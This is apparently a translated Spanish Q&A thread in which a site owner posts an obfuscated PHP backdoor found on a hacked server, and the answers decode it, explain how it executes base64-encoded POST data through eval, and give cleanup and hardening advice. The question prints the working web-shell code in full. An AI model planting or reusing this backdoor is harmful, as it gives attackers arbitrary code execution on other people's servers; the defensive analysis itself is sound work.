soy saltarse quitar pasar omitir los google evitar evadir eliminar como chrome php virus

php - saltarse - Tratando de descifrar un virus



recaptcha evadir (3)

La variable $s21 es igual a base64_decode y $s22 es igual a $_POST[''nd335c3''] .

Cada vez que se realiza una solicitud POST a su servidor, ejecuta cualquier comando que esté en $_POST[''nd335c3'']; lo cual como se puede esperar, es muy peligroso.

Dudo mucho que su servidor haya sido pirateado, pero en su lugar se explotó el script del sitio web ¿Hay algún lugar en su sitio donde los usuarios puedan cargar archivos? He visto muchas cosas como esta con WordPress con complementos mal codificados.

Arreglando el problema

Para solucionar el problema, primero elimine este archivo o la sección de código. Es posible que desee cerrar su sitio y ponerlo en modo de mantenimiento hasta que pueda buscar y verificar que no se hayan modificado todos los demás archivos.

Una vez que el sitio vuelva a estar en funcionamiento, registre las solicitudes realizadas donde se ubicó el archivo pirateado o las solicitudes que contienen la misma variable POST.

Una vez que tenga un usuario que envía datos al exploit, puede verificar todos sus otros archivos de registro y compararlos con la misma dirección IP y el agente del usuario. Esto es una posibilidad remota, pero esperamos que solo usen una computadora para realizar el ataque. Desde los registros se puede ver qué visitaron exactamente para posiblemente ejecutar el ataque y cargar el archivo explotado.

Prevenir esto en el futuro

  1. No instale ningún código que encuentre en línea en su sitio a menos que confíe en el desarrollador y crea que es completamente seguro y sepa que lanzan actualizaciones.
  2. Configure su servidor web para que no tenga acceso de escritura además del directorio de carga y /tmp
  3. Verifique todos los archivos cargados para asegurarse de que sean exactamente lo que espera que sean.
  4. No permita que PHP se ejecute donde se cargan los archivos, descargue los archivos como archivos directos estáticos. De esta manera, si se ha cargado un archivo que pasa por alto sus comprobaciones de archivos, todavía no puede hacer ningún daño.

Mi servidor fue atacado recientemente, y he estado tratando de investigar cómo y por qué está sucediendo.

He encontrado un patrón muy similar en los archivos de virus que se ve así: ¿puedo decir que está intentando ejecutar un archivo específico?

¿Alguien ha visto algo como esto y cómo debo interpretarlo? ¿Se trata simplemente de capturar caracteres individuales basados ​​en la cadena $sF ?

<?php $sF = "PCT4BA6ODSE_"; $s21 = strtolower($sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11] . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]); $s22 = ${strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2])}[''nd335c3'']; if (isset($s22)) { eval($s21($s22)); }?>


Muy bonito virus. Las respuestas anteriores parecen explicar bastante bien, pero quizás ahora puedas entender mejor PHP. Puedes ver cómo PHP es bastante amigable con los virus, pero esa es una de las cosas que lo hace tan versátil y tan genial. Un lenguaje genial, que se puede usar para muchas cosas.
Un ejemplo un poco menos malicioso de ofuscación de código:

<?php $v1 = "sartvuhi_"; $v2 = $v1[3] . $v1[6] . $v1[7] . $v1[0] . $v1[8]; $v3 = $v1[7] . $v1[0] . $v1[8] . $v1[1] . $v1[8]; $v4 = $v1[4] . $v1[7] . $v1[2] . $v1[5] . $v1[0]; echo $v2 . $v3 . $v4; ?>


Simplemente siga la base de código de contención en la cadena $ sF, y verá que

$21 = "base64_decode"; $22 = "_POST[''nd335c3'']";

y el resto del código, básicamente compruebe si _POST [''nd335c3''] existe y si es así ejecute el código PHP: base64_decode(_POST[''nd335c3'']);

Lo que se hace a continuación no lo sé, ya que no mostró el código completo del virus.

Espero que te ayude un poco.